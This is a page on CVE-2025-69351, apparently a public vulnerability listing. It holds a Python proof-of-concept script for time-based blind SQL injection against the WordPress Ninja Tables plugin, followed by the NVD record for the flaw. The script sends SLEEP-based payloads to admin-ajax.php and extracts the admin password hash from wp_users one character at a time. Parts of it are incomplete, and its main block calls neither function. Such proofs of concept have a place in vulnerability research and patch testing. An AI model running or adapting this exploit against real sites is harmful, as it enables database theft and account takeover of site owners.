CVE-2025-69351

# CVE-2025-69351 Ninja Tables SQL Injection PoC # Target: WordPress site with Ninja Tables plugin <= 5.2.4 # Type: Blind SQL Injection import requests import time import string target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" def extract_data_via_blind_sql_injection(target_url, payload_template): """ Blind SQL Injection PoC for CVE-2025-69351 This PoC demonstrates extracting database version information """ headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded", } # Payload to extract database version using time-based blind SQL injection # The actual vulnerable parameter needs to be identified through testing payload = payload_template.format( true_condition="SLEEP(5)", false_condition="SLEEP(0)", db_version_query="@@version" ) data = { "action": "ninja_tables_ajax_handler", "target_action": "get_table_data", "table_id": "1", "order_by": payload } start_time = time.time() response = requests.post(target_url, data=data, headers=headers) elapsed_time = time.time() - start_time if elapsed_time > 4: print("[+] Time-based blind SQL injection confirmed!") return True return False # Example boolean-based blind SQL injection def boolean_blind_sqli(target_url): """ Boolean-based blind SQL injection to extract admin password hash """ charset = string.ascii_lowercase + string.digits + ":.-_" result = "" for i in range(1, 65): for char in charset: payload = f"1' AND IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),{i},1)='{char}',SLEEP(3),0)-- -" data = { "action": "ninja_tables_ajax_handler", "target_action": "get_table_data", "table_id": payload } start = time.time() requests.post(target_url, data=data, timeout=10) if time.time() - start >= 2.5: result += char print(f"[*] Extracted: {result}") break return result if __name__ == "__main__": print("CVE-2025-69351 Ninja Tables SQL Injection PoC") print("Target: WordPress with Ninja Tables <= 5.2.4") print("Note: This is for authorized security testing only")

{"cve": {"id": "CVE-2025-69351", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:47.587", "lastModified": "2026-04-27T19:16:41.410", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Shahjahan Jewel Ninja Tables ninja-tables allows Blind SQL Injection.This issue affects Ninja Tables: from n/a through <= 5.2.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ninja-tables/vulnerability/wordpress-ninja-tables-plugin-5-2-4-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}